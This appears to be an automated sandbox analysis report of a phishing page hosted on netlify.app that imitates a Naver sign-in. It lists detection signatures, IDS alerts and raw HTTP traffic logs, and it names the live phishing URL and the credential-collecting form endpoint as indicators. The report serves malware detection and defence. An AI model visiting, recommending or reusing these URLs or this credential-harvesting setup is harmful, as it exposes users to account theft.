Edit tour

Windows Analysis Report
https://heuristic-knuth-588d37.netlify.app/?naps/

Overview

General Information

Sample URL:	https://heuristic-knuth-588d37.netlify.app/?naps/
Analysis ID:	1589350
Infos:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Yara detected HtmlPhish10

AI detected suspicious Javascript

Form action URLs do not match main URL

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML title does not match URL

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Suspicious form URL found

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1900,i,12343564241610681806,8701581686100418049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://heuristic-knuth-588d37.netlify.app/?naps/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_103	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ET PHISHING Generic Multibrand Ajax XHR CredPost Phishing Landing

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T01:32:55.475521+0100	2032515	2	Possible Social Engineering Attempted	3.125.36.175	443	192.168.2.5	49714	TCP

ET PHISHING Generic Multibrand NewInjection Phishing Landing Template

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T01:32:55.475521+0100	2032514	2	Possible Social Engineering Attempted	3.125.36.175	443	192.168.2.5	49714	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://heuristic-knuth-588d37.netlify.app/?naps/

Avira URL Cloud: detection malicious, Label: phishing

Antivirus detection for URL or domain

Source: https://essentialhandymanservices.com/wp/next.php

Avira URL Cloud: Label: malware

Phishing

AI detected phishing page

Source: https://heuristic-knuth-588d37.netlify.app/?naps/

Joe Sandbox AI: Score: 9 Reasons: The brand 'Naver' is a well-known South Korean online platform., The legitimate domain for Naver is 'naver.com'., The URL 'heuristic-knuth-588d37.netlify.app' does not match the legitimate domain for Naver., The URL is hosted on 'netlify.app', which is a platform for deploying web applications and not directly associated with Naver., The use of a generic subdomain pattern 'heuristic-knuth-588d37' is typical for automatically generated URLs on hosting platforms and is not indicative of a legitimate Naver site., Presence of input fields for 'Username' and 'Password' on a non-legitimate domain increases the risk of phishing. DOM: 1.0.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_103, type: DROPPED

AI detected suspicious Javascript

Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://heuristic-knuth-588d37.netlify.app/?naps/... The script demonstrates several high-risk behaviors, including data exfiltration, redirects to potentially malicious domains, and the use of obfuscated code. While some of the behaviors may be intended for legitimate purposes, such as analytics or error reporting, the overall implementation and lack of transparency raise significant security concerns.
Source: 0.4.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: http://www.xay.io/... The provided JavaScript snippet exhibits several high-risk behaviors, including data exfiltration, redirects to potentially malicious domains, and the use of obfuscated code. While some contextual factors, such as the use of analytics-related functionality, may suggest a legitimate purpose, the overall behavior of the script is concerning and requires further investigation.

Source: https://heuristic-knuth-588d37.netlify.app/?naps/

HTTP Parser: Form action: https://essentialhandymanservices.com/wp/next.php netlify essentialhandymanservices

Source: https://heuristic-knuth-588d37.netlify.app/?naps/

HTTP Parser: Number of links: 0

Source: http://www.xay.io/

HTTP Parser: Base64 decoded: <svg fill='#D7D7D7' style="float: right" xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>

Source: https://heuristic-knuth-588d37.netlify.app/?naps/

HTTP Parser: Title: -Naver Sign in does not match URL

Source: https://heuristic-knuth-588d37.netlify.app/?naps/

HTTP Parser: Form action: https://essentialhandymanservices.com/wp/next.php

Source: https://heuristic-knuth-588d37.netlify.app/?naps/

HTTP Parser: <input type="password" .../> found

Source: http://www.xay.io/	HTTP Parser: No favicon
Source: http://www.xay.io/	HTTP Parser: No favicon
Source: http://www.xay.io/	HTTP Parser: No favicon
Source: http://www.xay.io/	HTTP Parser: No favicon
Source: http://www.xay.io/	HTTP Parser: No favicon
Source: http://www.xay.io/privacy.html	HTTP Parser: No favicon

Source: https://heuristic-knuth-588d37.netlify.app/?naps/

HTTP Parser: No <meta name="author".. found

Source: https://heuristic-knuth-588d37.netlify.app/?naps/

HTTP Parser: No <meta name="copyright".. found

Source: Network traffic	Suricata IDS: 2032514 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 3.125.36.175:443 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2032515 - Severity 2 - ET PHISHING Generic Multibrand Ajax XHR CredPost Phishing Landing : 3.125.36.175:443 -> 192.168.2.5:49714

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?naps/ HTTP/1.1Host: heuristic-knuth-588d37.netlify.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://heuristic-knuth-588d37.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /g1U1hqo.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://heuristic-knuth-588d37.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /g1U1hqo.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon_1024.png HTTP/1.1Host: nid.naver.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /tr/mainsite2023/navbar-logo-dark-2023.png HTTP/1.1Host: www.dynadot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sxp/i/c4601e5f6cdd73216cafdd5af209201c.js HTTP/1.1Host: euob.netgreencolumn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /adsense/domains/caf.js?abp=1&adsdeli=true HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /tr/mainsite2023/navbar-logo-dark-2023.png HTTP/1.1Host: www.dynadot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sxp/i/c4601e5f6cdd73216cafdd5af209201c.js HTTP/1.1Host: euob.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /adsense/domains/caf.js?abp=1&adsdeli=true HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ct?id=77721&url=http%3A%2F%2Fwww.xay.io%2F&sf=0&tpi=&ch=landingpage&uvid=23281&tsf=0&tsfmi=&tsfu=&cb=1736641999892&hl=1&op=0&ag=300509663&rand=94158160962179265907110092789080717119000882265890071078272689702602859010811966965280&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=&ss=1280x1024&nc=0&at=&di=W1siZWYiLDkzNjVdLFsiYWJuY2giLDI1XSxbLTEsIi0iXSxbLTE0LCItIl0sWy0yMSwiLSJdLFstMjksIi0iXSxbLTQxLCItIl0sWy00NCwiMCwwLDAsNSJdLFstNDYsIjAiXSxbLTU4LCItIl0sWy00LCItIl0sWy0yMCwiLSJdLFstMjYsIntcInRqaHNcIjo4NTgwMDI0LFwidWpoc1wiOjQ0MzM0NDQsXCJqaHNsXCI6MjE3MjY0OTQ3Mn0iXSxbLTI4LCJlbi1VUyxlbiJdLFstNjAsMjAxXSxbLTYzLCItIl0sWy02NSwiLSJdLFstMTksIlswLDAsMCwwLDAsMCwxLDI0LDI0LFwiLVwiLDEyODAsOTg0LDEyODAsMTAyNCwxMjgwLDk4NCwxMjgwLDkwNywwLDAsMCwwLFwiLVwiLFwiLVwiLDEyODAsOTA3LG51bGxdIl0sWy0yMiwiW1wiblwiLFwiblwiXSJdLFstNDksIi0iXSxbLTE1LCItIl0sWy0xNiwiMCJdLFstMzUsIlsxNzM2NjQxOTk5NTcxLDVdIl0sWy01MCwiLSJdLFstNjQsIi0iXSxbLTIsIjI1LGQ0SE9YVlBYN2ZOak5iMUt1N2NXOWdURzgydlFWSTZBbTlneUZBQWlIa1R5REJmTW1YWGlpcGhFRG94Y2IwRmpDWTBBM0dOdURlSkZkWlhkb3k1VzMvNTg1cXBiVXc1Y3RQZnYiXSxbLTYsIntcIndcIjpbXCIwXCIsXCJ0Y2Jsb2NrXCIsXCJzZWFyY2hib3hCbG9ja1wiLFwiZ2V0WE1MaHR0cFwiLFwiYWpheFF1ZXJ5XCIsXCJhamF4QmFja2ZpbGxcIixcImxvYWRGZWVkXCIsXCJ4bWxIdHRwXCIsXCJsc1wiLFwiZ2V0TG9hZEZlZWRBcmd1bWVudHNcIixcIl9fY3RjZ19jdF83NzcyMV9leGVjXCJdLFwiblwiOltdLFwiZFwiOltdfSJdLFstOSwiKyJdLFstMTAsIi0iXSxbLTM5LCJbXCIyMDAzMDEwN1wiLDIsXCJHZWNrb1wiLFwiTmV0c2NhcGVcIixcIk1vemlsbGFcIixudWxsLG51bGwsZmFsc2UsbnVsbCxmYWxzZSxudWxsLDUsdHJ1ZSxmYWxzZSxudWxsLDAsZmFsc2UsZmFsc2VdIl0sWy01NSwiMCJdLFstNTksImRlbmllZCJdLFstNjcsIi0iXSxbLTgsIi0iXSxbLTI0LCJbXSJdLFstNDMsIjAwMDAwMDAxMDEwMDAwMDEwMDAxMTAxMTAxMDAxMTAxMDAwMDAxMCJdLFstNTIsIi0iXSxbLTU0LCJ7XCJoXCI6W1wiMzI5OTcyODQ1MlwiLFwiODIyODIzMTE5XCIsXCJfM1wiLFwiMjg3Mjg5OTMyMFwiXSxcImRcIjpbXSxcImJcIjpbXCJfMFwiLFwiMjY0NjAzODgyXCJdLFwic1wiOjF9Il0sWy02NiwiZ2VvbG9jYXRpb24sc3RvcmFnZWFjY2VzcyxnYW1lcGFkLGNoZWN0LG1pZGksZGlzcGxheWNhcHR1cmUsdXNiLGJyb3dzaW5ndG9waWNzLGxvY2FsZm9udHMscGljdHVyZWlucGljdHVyZSxqb2luYWRpbnRlcmVzdGdyb3VwLHB1YmxpY2tleWNyZWRlbnRpYWxzZ2V0LG90cGNyZWRlbnRpYWxzLGNodWFmb3JtZmFjdG9yLGVuY3J5cHRlZG1lZGlhLGNoc2F2ZWRhdGEsY2h1YWZ1bGx2ZXJzaW9ubGlzdCxjaHVhd293NjQsc2hhcmVkc3RvcmFnZSxjaGRvd25saW5rLGNocHJlZmVyc2NvbG9yc2NoZW1lLHN5bmN4aHIsY2h1YW1vZGVsLHNlcmlhbCxjYW1lcmEsY2hwcmVmZXJzcmVkdWNlZG1vdGlvbixwcml2YXRlc3RhdGV0b2tlbmlzc3VhbmNlLGJsdWV0b290aCxpZGVudGl0eWNyZWRlbnRpYWxzZ2V0LGNodWFmdWxsdmVyc2lvbixmdWxsc2NyZWVuLGNoZHByLHVubG9hZCxrZXlib2FyZG1hcCxjaHVhcGxhdGZvcm0sc2hhcmVkc3RvcmFnZXNlbGVjdHVybCxneXJvc2NvcGUsaW50ZXJlc3Rjb2hvcnQsd2luZG93cGxhY2VtZW50LGNodWFtb2JpbGUsY2h1YSxydW5hZGF1Y3Rpb24sbWFnbmV0b21ldGVyLGFjY2VsZXJvbWV0ZXIscHJpdmF0ZXN0YXRldG9rZW5yZWRlbXB0aW9uLGNodWFhcmNoLHhyc3BhdGlhbHRyYWNraW5nLGlkbGVkZXRlY3Rpb24sY2h1YXBsYXRmb3JtdmVyc2lvbixjaHdpZHRoLGNsaXBib2FyZHJlYWQsY2h2aWV3cG9ydHdpZHRoLHBheW1lbnQsY2h2aWV3cG9ydGhlaWdodCxjaHJ0dCxhdXRvcGxheSxjcm9zc29yaWdpbmlzb2xhdGVkLGhpZCxjaHVhYml0bmVzcyxzY3JlZW53YWtlbG9jayxwcml2YXRlYWdncmVnYXRpb24sY2xpcGJvYXJkd3JpdGUsYXR0cmlidXRpb25yZXBvcnRpbmcsY2hkZXZpY2VtZW1vcnksbWljcm9waG9u
Source: global traffic	HTTP traffic detected: GET /tracker/tc_imp.gif?e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07f52a13ad2a24710d14e681f2d1586d31c64e56ac8bf88b71208fe59f1d329e921c46bcf40e25c7ea8290ee95c400035db386ee683e99332bd06b442c316f0496f70bfc72f02431e24f97999c140ab51258fc6e279126332a5de6c7fd6d5431f2b436f0715a7902c701e56f2ab0b2093aef6298ee35d60013ee9f3e4869265bcd5d759bf079d5d3a63ccea9de6f13599d9b13a93350983f0c82a1e1ea3683aba8c063abbcaf1778807fc4eae965d8013d9c56d9c7c71d69338c722d795f6bbdea6fd4075e93daaa9ae7c433ebdcf71d2e113f01a1813dd405c85d0cd88c0bcdd70ff1b90d0f58838b62f3574937b6bccc2df0e37d7ec74bb11e0830dce37ef33024a5e8c6eff03dfcba874b4822ac419e0cf929b6b8d4d4f68fe481f5e72092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e62eb211bc23c1168d40c5a22ec60426e3ad94603b3e690a23151442d998e82c927cb20030067f83c50acd840a4fbbe18ba8b67ec3f3e5fb85fea9f54a4635f259c4d5212bf40a3b7aac090b3b04910df76405d0af843ade72dd378ab52dcabb0b9f7f0e28290b624df49f9bd9760326f969229d87dbc7c1d84f17dcf0eb6f9ca41e67ca9056657bf391c54475e663d423c049b27bc24d85aa46afe36dbc8982d0845536baa229699f70a68dacb956c13d261c05887a030de4e14d85f112ca9987da1490c595390e2b55e17ef854b85fb29d7bc971107403287762e75a8e9d210afa3c82b5ff35c5dd14da2161a510603eceabc30059ed74f392028344484038e0647fd9f6893fd95d68cbd950f492&cri=S9cmgKYQSv&ts=1155&cb=1736642001047 HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
Source: global traffic	HTTP traffic detected: GET /ct?id=77721&url=http%3A%2F%2Fwww.xay.io%2F&sf=0&tpi=&ch=landingpage&uvid=23281&tsf=0&tsfmi=&tsfu=&cb=1736641999892&hl=1&op=0&ag=300509663&rand=94158160962179265907110092789080717119000882265890071078272689702602859010811966965280&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=&ss=1280x1024&nc=0&at=&di=W1siZWYiLDkzNjVdLFsiYWJuY2giLDI1XSxbLTEsIi0iXSxbLTE0LCItIl0sWy0yMSwiLSJdLFstMjksIi0iXSxbLTQxLCItIl0sWy00NCwiMCwwLDAsNSJdLFstNDYsIjAiXSxbLTU4LCItIl0sWy00LCItIl0sWy0yMCwiLSJdLFstMjYsIntcInRqaHNcIjo4NTgwMDI0LFwidWpoc1wiOjQ0MzM0NDQsXCJqaHNsXCI6MjE3MjY0OTQ3Mn0iXSxbLTI4LCJlbi1VUyxlbiJdLFstNjAsMjAxXSxbLTYzLCItIl0sWy02NSwiLSJdLFstMTksIlswLDAsMCwwLDAsMCwxLDI0LDI0LFwiLVwiLDEyODAsOTg0LDEyODAsMTAyNCwxMjgwLDk4NCwxMjgwLDkwNywwLDAsMCwwLFwiLVwiLFwiLVwiLDEyODAsOTA3LG51bGxdIl0sWy0yMiwiW1wiblwiLFwiblwiXSJdLFstNDksIi0iXSxbLTE1LCItIl0sWy0xNiwiMCJdLFstMzUsIlsxNzM2NjQxOTk5NTcxLDVdIl0sWy01MCwiLSJdLFstNjQsIi0iXSxbLTIsIjI1LGQ0SE9YVlBYN2ZOak5iMUt1N2NXOWdURzgydlFWSTZBbTlneUZBQWlIa1R5REJmTW1YWGlpcGhFRG94Y2IwRmpDWTBBM0dOdURlSkZkWlhkb3k1VzMvNTg1cXBiVXc1Y3RQZnYiXSxbLTYsIntcIndcIjpbXCIwXCIsXCJ0Y2Jsb2NrXCIsXCJzZWFyY2hib3hCbG9ja1wiLFwiZ2V0WE1MaHR0cFwiLFwiYWpheFF1ZXJ5XCIsXCJhamF4QmFja2ZpbGxcIixcImxvYWRGZWVkXCIsXCJ4bWxIdHRwXCIsXCJsc1wiLFwiZ2V0TG9hZEZlZWRBcmd1bWVudHNcIixcIl9fY3RjZ19jdF83NzcyMV9leGVjXCJdLFwiblwiOltdLFwiZFwiOltdfSJdLFstOSwiKyJdLFstMTAsIi0iXSxbLTM5LCJbXCIyMDAzMDEwN1wiLDIsXCJHZWNrb1wiLFwiTmV0c2NhcGVcIixcIk1vemlsbGFcIixudWxsLG51bGwsZmFsc2UsbnVsbCxmYWxzZSxudWxsLDUsdHJ1ZSxmYWxzZSxudWxsLDAsZmFsc2UsZmFsc2VdIl0sWy01NSwiMCJdLFstNTksImRlbmllZCJdLFstNjcsIi0iXSxbLTgsIi0iXSxbLTI0LCJbXSJdLFstNDMsIjAwMDAwMDAxMDEwMDAwMDEwMDAxMTAxMTAxMDAxMTAxMDAwMDAxMCJdLFstNTIsIi0iXSxbLTU0LCJ7XCJoXCI6W1wiMzI5OTcyODQ1MlwiLFwiODIyODIzMTE5XCIsXCJfM1wiLFwiMjg3Mjg5OTMyMFwiXSxcImRcIjpbXSxcImJcIjpbXCJfMFwiLFwiMjY0NjAzODgyXCJdLFwic1wiOjF9Il0sWy02NiwiZ2VvbG9jYXRpb24sc3RvcmFnZWFjY2VzcyxnYW1lcGFkLGNoZWN0LG1pZGksZGlzcGxheWNhcHR1cmUsdXNiLGJyb3dzaW5ndG9waWNzLGxvY2FsZm9udHMscGljdHVyZWlucGljdHVyZSxqb2luYWRpbnRlcmVzdGdyb3VwLHB1YmxpY2tleWNyZWRlbnRpYWxzZ2V0LG90cGNyZWRlbnRpYWxzLGNodWFmb3JtZmFjdG9yLGVuY3J5cHRlZG1lZGlhLGNoc2F2ZWRhdGEsY2h1YWZ1bGx2ZXJzaW9ubGlzdCxjaHVhd293NjQsc2hhcmVkc3RvcmFnZSxjaGRvd25saW5rLGNocHJlZmVyc2NvbG9yc2NoZW1lLHN5bmN4aHIsY2h1YW1vZGVsLHNlcmlhbCxjYW1lcmEsY2hwcmVmZXJzcmVkdWNlZG1vdGlvbixwcml2YXRlc3RhdGV0b2tlbmlzc3VhbmNlLGJsdWV0b290aCxpZGVudGl0eWNyZWRlbnRpYWxzZ2V0LGNodWFmdWxsdmVyc2lvbixmdWxsc2NyZWVuLGNoZHByLHVubG9hZCxrZXlib2FyZG1hcCxjaHVhcGxhdGZvcm0sc2hhcmVkc3RvcmFnZXNlbGVjdHVybCxneXJvc2NvcGUsaW50ZXJlc3Rjb2hvcnQsd2luZG93cGxhY2VtZW50LGNodWFtb2JpbGUsY2h1YSxydW5hZGF1Y3Rpb24sbWFnbmV0b21ldGVyLGFjY2VsZXJvbWV0ZXIscHJpdmF0ZXN0YXRldG9rZW5yZWRlbXB0aW9uLGNodWFhcmNoLHhyc3BhdGlhbHRyYWNraW5nLGlkbGVkZXRlY3Rpb24sY2h1YXBsYXRmb3JtdmVyc2lvbixjaHdpZHRoLGNsaXBib2FyZHJlYWQsY2h2aWV3cG9ydHdpZHRoLHBheW1lbnQsY2h2aWV3cG9ydGhlaWdodCxjaH